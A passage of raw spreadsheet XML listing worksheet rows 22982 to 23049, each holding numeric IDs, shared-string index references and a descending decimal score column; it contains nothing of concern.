      </c>
      <c r="E22982" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22982" s="2">
        <v>0.2213541666666667</v>
      </c>
    </row>
    <row r="22983" ht="15.75" customHeight="1">
      <c r="A22983" s="1">
        <v>33930.0</v>
      </c>
      <c r="B22983" s="2">
        <v>9281899.0</v>
      </c>
      <c r="C22983" s="2" t="s">
        <v>22193</v>
      </c>
      <c r="D22983" s="2">
        <v>1.0</v>
      </c>
      <c r="E22983" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22983" s="2">
        <v>0.2213541666666667</v>
      </c>
    </row>
    <row r="22984" ht="15.75" customHeight="1">
      <c r="A22984" s="1">
        <v>26880.0</v>
      </c>
      <c r="B22984" s="2">
        <v>1.9190689E7</v>
      </c>
      <c r="C22984" s="2" t="s">
        <v>22195</v>
      </c>
      <c r="D22984" s="2">
        <v>1.0</v>
      </c>
      <c r="E22984" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22984" s="2">
        <v>0.2196969696969698</v>
      </c>
    </row>
    <row r="22985" ht="15.75" customHeight="1">
      <c r="A22985" s="1">
        <v>30769.0</v>
      </c>
      <c r="B22985" s="2">
        <v>4.4517125E7</v>
      </c>
      <c r="C22985" s="2" t="s">
        <v>22196</v>
      </c>
      <c r="D22985" s="2">
        <v>1.0</v>
      </c>
      <c r="E22985" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22985" s="2">
        <v>0.2189922480620155</v>
      </c>
    </row>
    <row r="22986" ht="15.75" customHeight="1">
      <c r="A22986" s="1">
        <v>23559.0</v>
      </c>
      <c r="B22986" s="2">
        <v>6146040.0</v>
      </c>
      <c r="C22986" s="2" t="s">
        <v>22197</v>
      </c>
      <c r="D22986" s="2">
        <v>1.0</v>
      </c>
      <c r="E22986" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22986" s="2">
        <v>0.2157407407407408</v>
      </c>
    </row>
    <row r="22987" ht="15.75" customHeight="1">
      <c r="A22987" s="1">
        <v>32793.0</v>
      </c>
      <c r="B22987" s="2">
        <v>6146039.0</v>
      </c>
      <c r="C22987" s="2" t="s">
        <v>22198</v>
      </c>
      <c r="D22987" s="2">
        <v>1.0</v>
      </c>
      <c r="E22987" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22987" s="2">
        <v>0.2157407407407408</v>
      </c>
    </row>
    <row r="22988" ht="15.75" customHeight="1">
      <c r="A22988" s="1">
        <v>27215.0</v>
      </c>
      <c r="B22988" s="2">
        <v>2.0966557E7</v>
      </c>
      <c r="C22988" s="2" t="s">
        <v>22199</v>
      </c>
      <c r="D22988" s="2">
        <v>1.0</v>
      </c>
      <c r="E22988" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22988" s="2">
        <v>0.2152777777777778</v>
      </c>
    </row>
    <row r="22989" ht="15.75" customHeight="1">
      <c r="A22989" s="1">
        <v>25139.0</v>
      </c>
      <c r="B22989" s="2">
        <v>1.3029614E7</v>
      </c>
      <c r="C22989" s="2" t="s">
        <v>22200</v>
      </c>
      <c r="D22989" s="2">
        <v>1.0</v>
      </c>
      <c r="E22989" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22989" s="2">
        <v>0.2106481481481482</v>
      </c>
    </row>
    <row r="22990" ht="15.75" customHeight="1">
      <c r="A22990" s="1">
        <v>22648.0</v>
      </c>
      <c r="B22990" s="2">
        <v>4.091179E7</v>
      </c>
      <c r="C22990" s="2" t="s">
        <v>22201</v>
      </c>
      <c r="D22990" s="2">
        <v>1.0</v>
      </c>
      <c r="E22990" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22990" s="2">
        <v>0.2083333333333334</v>
      </c>
    </row>
    <row r="22991" ht="15.75" customHeight="1">
      <c r="A22991" s="1">
        <v>28835.0</v>
      </c>
      <c r="B22991" s="2">
        <v>2.8912091E7</v>
      </c>
      <c r="C22991" s="2" t="s">
        <v>22202</v>
      </c>
      <c r="D22991" s="2">
        <v>1.0</v>
      </c>
      <c r="E22991" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22991" s="2">
        <v>0.2083333333333334</v>
      </c>
    </row>
    <row r="22992" ht="15.75" customHeight="1">
      <c r="A22992" s="1">
        <v>21693.0</v>
      </c>
      <c r="B22992" s="2">
        <v>2.5220879E7</v>
      </c>
      <c r="C22992" s="2" t="s">
        <v>22203</v>
      </c>
      <c r="D22992" s="2">
        <v>1.0</v>
      </c>
      <c r="E22992" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22992" s="2">
        <v>0.2054673721340389</v>
      </c>
    </row>
    <row r="22993" ht="15.75" customHeight="1">
      <c r="A22993" s="1">
        <v>21694.0</v>
      </c>
      <c r="B22993" s="2">
        <v>2.5221286E7</v>
      </c>
      <c r="C22993" s="2" t="s">
        <v>22204</v>
      </c>
      <c r="D22993" s="2">
        <v>1.0</v>
      </c>
      <c r="E22993" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22993" s="2">
        <v>0.2039930555555556</v>
      </c>
    </row>
    <row r="22994" ht="15.75" customHeight="1">
      <c r="A22994" s="1">
        <v>29801.0</v>
      </c>
      <c r="B22994" s="2">
        <v>3.5117382E7</v>
      </c>
      <c r="C22994" s="2" t="s">
        <v>22205</v>
      </c>
      <c r="D22994" s="2">
        <v>1.0</v>
      </c>
      <c r="E22994" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22994" s="2">
        <v>0.2027777777777779</v>
      </c>
    </row>
    <row r="22995" ht="15.75" customHeight="1">
      <c r="A22995" s="1">
        <v>32745.0</v>
      </c>
      <c r="B22995" s="2">
        <v>6044808.0</v>
      </c>
      <c r="C22995" s="2" t="s">
        <v>22206</v>
      </c>
      <c r="D22995" s="2">
        <v>1.0</v>
      </c>
      <c r="E22995" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22995" s="2">
        <v>0.2021963824289406</v>
      </c>
    </row>
    <row r="22996" ht="15.75" customHeight="1">
      <c r="A22996" s="1">
        <v>33840.0</v>
      </c>
      <c r="B22996" s="2">
        <v>9008464.0</v>
      </c>
      <c r="C22996" s="2" t="s">
        <v>22207</v>
      </c>
      <c r="D22996" s="2">
        <v>1.0</v>
      </c>
      <c r="E22996" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22996" s="2">
        <v>0.2004830917874397</v>
      </c>
    </row>
    <row r="22997" ht="15.75" customHeight="1">
      <c r="A22997" s="1">
        <v>33129.0</v>
      </c>
      <c r="B22997" s="2">
        <v>7031770.0</v>
      </c>
      <c r="C22997" s="2" t="s">
        <v>22208</v>
      </c>
      <c r="D22997" s="2">
        <v>1.0</v>
      </c>
      <c r="E22997" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22997" s="2">
        <v>0.199530516431925</v>
      </c>
    </row>
    <row r="22998" ht="15.75" customHeight="1">
      <c r="A22998" s="1">
        <v>22311.0</v>
      </c>
      <c r="B22998" s="2">
        <v>3.3853397E7</v>
      </c>
      <c r="C22998" s="2" t="s">
        <v>22209</v>
      </c>
      <c r="D22998" s="2">
        <v>1.0</v>
      </c>
      <c r="E22998" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22998" s="2">
        <v>0.1994535519125683</v>
      </c>
    </row>
    <row r="22999" ht="15.75" customHeight="1">
      <c r="A22999" s="1">
        <v>30762.0</v>
      </c>
      <c r="B22999" s="2">
        <v>4.4314489E7</v>
      </c>
      <c r="C22999" s="2" t="s">
        <v>22210</v>
      </c>
      <c r="D22999" s="2">
        <v>1.0</v>
      </c>
      <c r="E22999" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22999" s="2">
        <v>0.1980286738351255</v>
      </c>
    </row>
    <row r="23000" ht="15.75" customHeight="1">
      <c r="A23000" s="1">
        <v>33592.0</v>
      </c>
      <c r="B23000" s="2">
        <v>8328439.0</v>
      </c>
      <c r="C23000" s="2" t="s">
        <v>22211</v>
      </c>
      <c r="D23000" s="2">
        <v>1.0</v>
      </c>
      <c r="E23000" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23000" s="2">
        <v>0.1965277777777778</v>
      </c>
    </row>
    <row r="23001" ht="15.75" customHeight="1">
      <c r="A23001" s="1">
        <v>26856.0</v>
      </c>
      <c r="B23001" s="2">
        <v>1.901786E7</v>
      </c>
      <c r="C23001" s="2" t="s">
        <v>22212</v>
      </c>
      <c r="D23001" s="2">
        <v>1.0</v>
      </c>
      <c r="E23001" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23001" s="2">
        <v>0.196236559139785</v>
      </c>
    </row>
    <row r="23002" ht="15.75" customHeight="1">
      <c r="A23002" s="1">
        <v>21422.0</v>
      </c>
      <c r="B23002" s="2">
        <v>2.2077828E7</v>
      </c>
      <c r="C23002" s="2" t="s">
        <v>22213</v>
      </c>
      <c r="D23002" s="2">
        <v>1.0</v>
      </c>
      <c r="E23002" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23002" s="2">
        <v>0.1932006633499171</v>
      </c>
    </row>
    <row r="23003" ht="15.75" customHeight="1">
      <c r="A23003" s="1">
        <v>29092.0</v>
      </c>
      <c r="B23003" s="2">
        <v>3.0389828E7</v>
      </c>
      <c r="C23003" s="2" t="s">
        <v>22214</v>
      </c>
      <c r="D23003" s="2">
        <v>1.0</v>
      </c>
      <c r="E23003" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23003" s="2">
        <v>0.1932006633499171</v>
      </c>
    </row>
    <row r="23004" ht="15.75" customHeight="1">
      <c r="A23004" s="1">
        <v>13416.0</v>
      </c>
      <c r="B23004" s="2">
        <v>3.5023938E7</v>
      </c>
      <c r="C23004" s="2" t="s">
        <v>22215</v>
      </c>
      <c r="D23004" s="2">
        <v>1.0</v>
      </c>
      <c r="E23004" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23004" s="2">
        <v>0.1923076923076923</v>
      </c>
    </row>
    <row r="23005" ht="15.75" customHeight="1">
      <c r="A23005" s="1">
        <v>23916.0</v>
      </c>
      <c r="B23005" s="2">
        <v>8531488.0</v>
      </c>
      <c r="C23005" s="2" t="s">
        <v>22216</v>
      </c>
      <c r="D23005" s="2">
        <v>1.0</v>
      </c>
      <c r="E23005" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23005" s="2">
        <v>0.1920077972709553</v>
      </c>
    </row>
    <row r="23006" ht="15.75" customHeight="1">
      <c r="A23006" s="1">
        <v>28671.0</v>
      </c>
      <c r="B23006" s="2">
        <v>2.7511131E7</v>
      </c>
      <c r="C23006" s="2" t="s">
        <v>22217</v>
      </c>
      <c r="D23006" s="2">
        <v>1.0</v>
      </c>
      <c r="E23006" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23006" s="2">
        <v>0.1917057902973396</v>
      </c>
    </row>
    <row r="23007" ht="15.75" customHeight="1">
      <c r="A23007" s="1">
        <v>30448.0</v>
      </c>
      <c r="B23007" s="2">
        <v>3.9297593E7</v>
      </c>
      <c r="C23007" s="2" t="s">
        <v>22218</v>
      </c>
      <c r="D23007" s="2">
        <v>1.0</v>
      </c>
      <c r="E23007" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23007" s="2">
        <v>0.1910197869101979</v>
      </c>
    </row>
    <row r="23008" ht="15.75" customHeight="1">
      <c r="A23008" s="1">
        <v>22051.0</v>
      </c>
      <c r="B23008" s="2">
        <v>3.0389829E7</v>
      </c>
      <c r="C23008" s="2" t="s">
        <v>22219</v>
      </c>
      <c r="D23008" s="2">
        <v>1.0</v>
      </c>
      <c r="E23008" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23008" s="2">
        <v>0.1906130268199235</v>
      </c>
    </row>
    <row r="23009" ht="15.75" customHeight="1">
      <c r="A23009" s="1">
        <v>26099.0</v>
      </c>
      <c r="B23009" s="2">
        <v>1.5735848E7</v>
      </c>
      <c r="C23009" s="2" t="s">
        <v>22220</v>
      </c>
      <c r="D23009" s="2">
        <v>1.0</v>
      </c>
      <c r="E23009" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23009" s="2">
        <v>0.1903460837887068</v>
      </c>
    </row>
    <row r="23010" ht="15.75" customHeight="1">
      <c r="A23010" s="1">
        <v>27830.0</v>
      </c>
      <c r="B23010" s="2">
        <v>2.3406142E7</v>
      </c>
      <c r="C23010" s="2" t="s">
        <v>22221</v>
      </c>
      <c r="D23010" s="2">
        <v>1.0</v>
      </c>
      <c r="E23010" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23010" s="2">
        <v>0.1901041666666667</v>
      </c>
    </row>
    <row r="23011" ht="15.75" customHeight="1">
      <c r="A23011" s="1">
        <v>23583.0</v>
      </c>
      <c r="B23011" s="2">
        <v>6270622.0</v>
      </c>
      <c r="C23011" s="2" t="s">
        <v>22222</v>
      </c>
      <c r="D23011" s="2">
        <v>1.0</v>
      </c>
      <c r="E23011" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23011" s="2">
        <v>0.189594356261023</v>
      </c>
    </row>
    <row r="23012" ht="15.75" customHeight="1">
      <c r="A23012" s="1">
        <v>25784.0</v>
      </c>
      <c r="B23012" s="2">
        <v>1.4669538E7</v>
      </c>
      <c r="C23012" s="2" t="s">
        <v>22223</v>
      </c>
      <c r="D23012" s="2">
        <v>1.0</v>
      </c>
      <c r="E23012" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23012" s="2">
        <v>0.1892655367231639</v>
      </c>
    </row>
    <row r="23013" ht="15.75" customHeight="1">
      <c r="A23013" s="1">
        <v>33735.0</v>
      </c>
      <c r="B23013" s="2">
        <v>8531487.0</v>
      </c>
      <c r="C23013" s="2" t="s">
        <v>22216</v>
      </c>
      <c r="D23013" s="2">
        <v>1.0</v>
      </c>
      <c r="E23013" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23013" s="2">
        <v>0.1881091617933724</v>
      </c>
    </row>
    <row r="23014" ht="15.75" customHeight="1">
      <c r="A23014" s="1">
        <v>32084.0</v>
      </c>
      <c r="B23014" s="2">
        <v>5387912.0</v>
      </c>
      <c r="C23014" s="2" t="s">
        <v>22224</v>
      </c>
      <c r="D23014" s="2">
        <v>1.0</v>
      </c>
      <c r="E23014" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23014" s="2">
        <v>0.1879756468797565</v>
      </c>
    </row>
    <row r="23015" ht="15.75" customHeight="1">
      <c r="A23015" s="1">
        <v>20133.0</v>
      </c>
      <c r="B23015" s="2">
        <v>1.0097869E7</v>
      </c>
      <c r="C23015" s="2" t="s">
        <v>22225</v>
      </c>
      <c r="D23015" s="2">
        <v>1.0</v>
      </c>
      <c r="E23015" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23015" s="2">
        <v>0.1873822975517891</v>
      </c>
    </row>
    <row r="23016" ht="15.75" customHeight="1">
      <c r="A23016" s="1">
        <v>24155.0</v>
      </c>
      <c r="B23016" s="2">
        <v>1.0097868E7</v>
      </c>
      <c r="C23016" s="2" t="s">
        <v>22225</v>
      </c>
      <c r="D23016" s="2">
        <v>1.0</v>
      </c>
      <c r="E23016" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23016" s="2">
        <v>0.1873822975517891</v>
      </c>
    </row>
    <row r="23017" ht="15.75" customHeight="1">
      <c r="A23017" s="1">
        <v>32001.0</v>
      </c>
      <c r="B23017" s="2">
        <v>5342496.0</v>
      </c>
      <c r="C23017" s="2" t="s">
        <v>22226</v>
      </c>
      <c r="D23017" s="2">
        <v>1.0</v>
      </c>
      <c r="E23017" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23017" s="2">
        <v>0.1873822975517891</v>
      </c>
    </row>
    <row r="23018" ht="15.75" customHeight="1">
      <c r="A23018" s="1">
        <v>23097.0</v>
      </c>
      <c r="B23018" s="2">
        <v>5.0788568E7</v>
      </c>
      <c r="C23018" s="2" t="s">
        <v>22227</v>
      </c>
      <c r="D23018" s="2">
        <v>1.0</v>
      </c>
      <c r="E23018" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23018" s="2">
        <v>0.1872759856630825</v>
      </c>
    </row>
    <row r="23019" ht="15.75" customHeight="1">
      <c r="A23019" s="1">
        <v>26097.0</v>
      </c>
      <c r="B23019" s="2">
        <v>1.5735848E7</v>
      </c>
      <c r="C23019" s="2" t="s">
        <v>22228</v>
      </c>
      <c r="D23019" s="2">
        <v>1.0</v>
      </c>
      <c r="E23019" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23019" s="2">
        <v>0.1861111111111112</v>
      </c>
    </row>
    <row r="23020" ht="15.75" customHeight="1">
      <c r="A23020" s="1">
        <v>27501.0</v>
      </c>
      <c r="B23020" s="2">
        <v>2.2077827E7</v>
      </c>
      <c r="C23020" s="2" t="s">
        <v>22213</v>
      </c>
      <c r="D23020" s="2">
        <v>1.0</v>
      </c>
      <c r="E23020" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23020" s="2">
        <v>0.1849087893864014</v>
      </c>
    </row>
    <row r="23021" ht="15.75" customHeight="1">
      <c r="A23021" s="1">
        <v>26754.0</v>
      </c>
      <c r="B23021" s="2">
        <v>1.8407198E7</v>
      </c>
      <c r="C23021" s="2" t="s">
        <v>22229</v>
      </c>
      <c r="D23021" s="2">
        <v>1.0</v>
      </c>
      <c r="E23021" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23021" s="2">
        <v>0.1843033509700177</v>
      </c>
    </row>
    <row r="23022" ht="15.75" customHeight="1">
      <c r="A23022" s="1">
        <v>20851.0</v>
      </c>
      <c r="B23022" s="2">
        <v>1.5735849E7</v>
      </c>
      <c r="C23022" s="2" t="s">
        <v>22230</v>
      </c>
      <c r="D23022" s="2">
        <v>1.0</v>
      </c>
      <c r="E23022" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23022" s="2">
        <v>0.1842592592592593</v>
      </c>
    </row>
    <row r="23023" ht="15.75" customHeight="1">
      <c r="A23023" s="1">
        <v>26155.0</v>
      </c>
      <c r="B23023" s="2">
        <v>1.608348E7</v>
      </c>
      <c r="C23023" s="2" t="s">
        <v>22231</v>
      </c>
      <c r="D23023" s="2">
        <v>1.0</v>
      </c>
      <c r="E23023" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23023" s="2">
        <v>0.1842592592592593</v>
      </c>
    </row>
    <row r="23024" ht="15.75" customHeight="1">
      <c r="A23024" s="1">
        <v>11282.0</v>
      </c>
      <c r="B23024" s="2">
        <v>2.0794462E7</v>
      </c>
      <c r="C23024" s="2" t="s">
        <v>22232</v>
      </c>
      <c r="D23024" s="2">
        <v>1.0</v>
      </c>
      <c r="E23024" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23024" s="2">
        <v>0.1838810641627543</v>
      </c>
    </row>
    <row r="23025" ht="15.75" customHeight="1">
      <c r="A23025" s="1">
        <v>31516.0</v>
      </c>
      <c r="B23025" s="2">
        <v>5.0788567E7</v>
      </c>
      <c r="C23025" s="2" t="s">
        <v>22227</v>
      </c>
      <c r="D23025" s="2">
        <v>1.0</v>
      </c>
      <c r="E23025" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23025" s="2">
        <v>0.1836917562724015</v>
      </c>
    </row>
    <row r="23026" ht="15.75" customHeight="1">
      <c r="A23026" s="1">
        <v>25950.0</v>
      </c>
      <c r="B23026" s="2">
        <v>1.5238696E7</v>
      </c>
      <c r="C23026" s="2" t="s">
        <v>22233</v>
      </c>
      <c r="D23026" s="2">
        <v>1.0</v>
      </c>
      <c r="E23026" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23026" s="2">
        <v>0.1831597222222223</v>
      </c>
    </row>
    <row r="23027" ht="15.75" customHeight="1">
      <c r="A23027" s="1">
        <v>26881.0</v>
      </c>
      <c r="B23027" s="2">
        <v>1.9190689E7</v>
      </c>
      <c r="C23027" s="2" t="s">
        <v>22234</v>
      </c>
      <c r="D23027" s="2">
        <v>1.0</v>
      </c>
      <c r="E23027" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23027" s="2">
        <v>0.1831597222222223</v>
      </c>
    </row>
    <row r="23028" ht="15.75" customHeight="1">
      <c r="A23028" s="1">
        <v>22456.0</v>
      </c>
      <c r="B23028" s="2">
        <v>3.6307929E7</v>
      </c>
      <c r="C23028" s="2" t="s">
        <v>22235</v>
      </c>
      <c r="D23028" s="2">
        <v>1.0</v>
      </c>
      <c r="E23028" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23028" s="2">
        <v>0.1830601092896176</v>
      </c>
    </row>
    <row r="23029" ht="15.75" customHeight="1">
      <c r="A23029" s="1">
        <v>20722.0</v>
      </c>
      <c r="B23029" s="2">
        <v>1.4659306E7</v>
      </c>
      <c r="C23029" s="2" t="s">
        <v>22236</v>
      </c>
      <c r="D23029" s="2">
        <v>1.0</v>
      </c>
      <c r="E23029" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23029" s="2">
        <v>0.1830601092896175</v>
      </c>
    </row>
    <row r="23030" ht="15.75" customHeight="1">
      <c r="A23030" s="1">
        <v>27866.0</v>
      </c>
      <c r="B23030" s="2">
        <v>2.3524693E7</v>
      </c>
      <c r="C23030" s="2" t="s">
        <v>22237</v>
      </c>
      <c r="D23030" s="2">
        <v>1.0</v>
      </c>
      <c r="E23030" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23030" s="2">
        <v>0.1826599326599327</v>
      </c>
    </row>
    <row r="23031" ht="15.75" customHeight="1">
      <c r="A23031" s="1">
        <v>20881.0</v>
      </c>
      <c r="B23031" s="2">
        <v>1.6083481E7</v>
      </c>
      <c r="C23031" s="2" t="s">
        <v>22231</v>
      </c>
      <c r="D23031" s="2">
        <v>1.0</v>
      </c>
      <c r="E23031" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23031" s="2">
        <v>0.1824074074074075</v>
      </c>
    </row>
    <row r="23032" ht="15.75" customHeight="1">
      <c r="A23032" s="1">
        <v>21540.0</v>
      </c>
      <c r="B23032" s="2">
        <v>2.3524694E7</v>
      </c>
      <c r="C23032" s="2" t="s">
        <v>22238</v>
      </c>
      <c r="D23032" s="2">
        <v>1.0</v>
      </c>
      <c r="E23032" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23032" s="2">
        <v>0.180976430976431</v>
      </c>
    </row>
    <row r="23033" ht="15.75" customHeight="1">
      <c r="A23033" s="1">
        <v>27392.0</v>
      </c>
      <c r="B23033" s="2">
        <v>2.1787142E7</v>
      </c>
      <c r="C23033" s="2" t="s">
        <v>22239</v>
      </c>
      <c r="D23033" s="2">
        <v>1.0</v>
      </c>
      <c r="E23033" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23033" s="2">
        <v>0.1803418803418803</v>
      </c>
    </row>
    <row r="23034" ht="15.75" customHeight="1">
      <c r="A23034" s="1">
        <v>31528.0</v>
      </c>
      <c r="B23034" s="2">
        <v>5.0901362E7</v>
      </c>
      <c r="C23034" s="2" t="s">
        <v>22240</v>
      </c>
      <c r="D23034" s="2">
        <v>1.0</v>
      </c>
      <c r="E23034" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23034" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="23035" ht="15.75" customHeight="1">
      <c r="A23035" s="1">
        <v>1939.0</v>
      </c>
      <c r="B23035" s="2">
        <v>3.0201508E7</v>
      </c>
      <c r="C23035" s="2" t="s">
        <v>22241</v>
      </c>
      <c r="D23035" s="2">
        <v>1.0</v>
      </c>
      <c r="E23035" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23035" s="2">
        <v>0.1786324786324787</v>
      </c>
    </row>
    <row r="23036" ht="15.75" customHeight="1">
      <c r="A23036" s="1">
        <v>25567.0</v>
      </c>
      <c r="B23036" s="2">
        <v>1.4316959E7</v>
      </c>
      <c r="C23036" s="2" t="s">
        <v>22242</v>
      </c>
      <c r="D23036" s="2">
        <v>1.0</v>
      </c>
      <c r="E23036" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23036" s="2">
        <v>0.178395061728395</v>
      </c>
    </row>
    <row r="23037" ht="15.75" customHeight="1">
      <c r="A23037" s="1">
        <v>22659.0</v>
      </c>
      <c r="B23037" s="2">
        <v>4118262.0</v>
      </c>
      <c r="C23037" s="2" t="s">
        <v>22243</v>
      </c>
      <c r="D23037" s="2">
        <v>1.0</v>
      </c>
      <c r="E23037" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23037" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="23038" ht="15.75" customHeight="1">
      <c r="A23038" s="1">
        <v>30583.0</v>
      </c>
      <c r="B23038" s="2">
        <v>4118261.0</v>
      </c>
      <c r="C23038" s="2" t="s">
        <v>22243</v>
      </c>
      <c r="D23038" s="2">
        <v>1.0</v>
      </c>
      <c r="E23038" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23038" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="23039" ht="15.75" customHeight="1">
      <c r="A23039" s="1">
        <v>21730.0</v>
      </c>
      <c r="B23039" s="2">
        <v>2.5708805E7</v>
      </c>
      <c r="C23039" s="2" t="s">
        <v>22244</v>
      </c>
      <c r="D23039" s="2">
        <v>1.0</v>
      </c>
      <c r="E23039" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23039" s="2">
        <v>0.17831541218638</v>
      </c>
    </row>
    <row r="23040" ht="15.75" customHeight="1">
      <c r="A23040" s="1">
        <v>24448.0</v>
      </c>
      <c r="B23040" s="2">
        <v>1.0916169E7</v>
      </c>
      <c r="C23040" s="2" t="s">
        <v>22245</v>
      </c>
      <c r="D23040" s="2">
        <v>1.0</v>
      </c>
      <c r="E23040" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23040" s="2">
        <v>0.1782752902155888</v>
      </c>
    </row>
    <row r="23041" ht="15.75" customHeight="1">
      <c r="A23041" s="1">
        <v>23823.0</v>
      </c>
      <c r="B23041" s="2">
        <v>7996304.0</v>
      </c>
      <c r="C23041" s="2" t="s">
        <v>22246</v>
      </c>
      <c r="D23041" s="2">
        <v>1.0</v>
      </c>
      <c r="E23041" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23041" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="23042" ht="15.75" customHeight="1">
      <c r="A23042" s="1">
        <v>33071.0</v>
      </c>
      <c r="B23042" s="2">
        <v>6874736.0</v>
      </c>
      <c r="C23042" s="2" t="s">
        <v>22247</v>
      </c>
      <c r="D23042" s="2">
        <v>1.0</v>
      </c>
      <c r="E23042" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23042" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="23043" ht="15.75" customHeight="1">
      <c r="A23043" s="1">
        <v>24207.0</v>
      </c>
      <c r="B23043" s="2">
        <v>1.0380559E7</v>
      </c>
      <c r="C23043" s="2" t="s">
        <v>22248</v>
      </c>
      <c r="D23043" s="2">
        <v>1.0</v>
      </c>
      <c r="E23043" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23043" s="2">
        <v>0.176923076923077</v>
      </c>
    </row>
    <row r="23044" ht="15.75" customHeight="1">
      <c r="A23044" s="1">
        <v>26818.0</v>
      </c>
      <c r="B23044" s="2">
        <v>1.8751597E7</v>
      </c>
      <c r="C23044" s="2" t="s">
        <v>22249</v>
      </c>
      <c r="D23044" s="2">
        <v>1.0</v>
      </c>
      <c r="E23044" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23044" s="2">
        <v>0.1766169154228856</v>
      </c>
    </row>
    <row r="23045" ht="15.75" customHeight="1">
      <c r="A23045" s="1">
        <v>25103.0</v>
      </c>
      <c r="B23045" s="2">
        <v>1.2950506E7</v>
      </c>
      <c r="C23045" s="2" t="s">
        <v>22250</v>
      </c>
      <c r="D23045" s="2">
        <v>1.0</v>
      </c>
      <c r="E23045" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23045" s="2">
        <v>0.1765232974910395</v>
      </c>
    </row>
    <row r="23046" ht="15.75" customHeight="1">
      <c r="A23046" s="1">
        <v>30091.0</v>
      </c>
      <c r="B23046" s="2">
        <v>3.6353866E7</v>
      </c>
      <c r="C23046" s="2" t="s">
        <v>22251</v>
      </c>
      <c r="D23046" s="2">
        <v>1.0</v>
      </c>
      <c r="E23046" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23046" s="2">
        <v>0.176328502415459</v>
      </c>
    </row>
    <row r="23047" ht="15.75" customHeight="1">
      <c r="A23047" s="1">
        <v>29877.0</v>
      </c>
      <c r="B23047" s="2">
        <v>3.6031568E7</v>
      </c>
      <c r="C23047" s="2" t="s">
        <v>22252</v>
      </c>
      <c r="D23047" s="2">
        <v>1.0</v>
      </c>
      <c r="E23047" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23047" s="2">
        <v>0.1762152777777778</v>
      </c>
    </row>
    <row r="23048" ht="15.75" customHeight="1">
      <c r="A23048" s="1">
        <v>22143.0</v>
      </c>
      <c r="B23048" s="2">
        <v>3.1186034E7</v>
      </c>
      <c r="C23048" s="2" t="s">
        <v>22253</v>
      </c>
      <c r="D23048" s="2">
        <v>1.0</v>
      </c>
      <c r="E23048" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23048" s="2">
        <v>0.1754850088183422</v>
      </c>
    </row>
    <row r="23049" ht="15.75" customHeight="1">
      <c r="A23049" s="1">
        <v>33922.0</v>
      </c>
      <c r="B23049" s="2">
        <v>9269031.0</v>
      </c>
      <c r="C23049" s="2" t="s">
        <v>22254</v>
      </c>
      <c r="D23049" s="2">
        <v>1.0</v>
      </c>
      <c r="E23049" s="3" t="s">
        <v>22188</v>
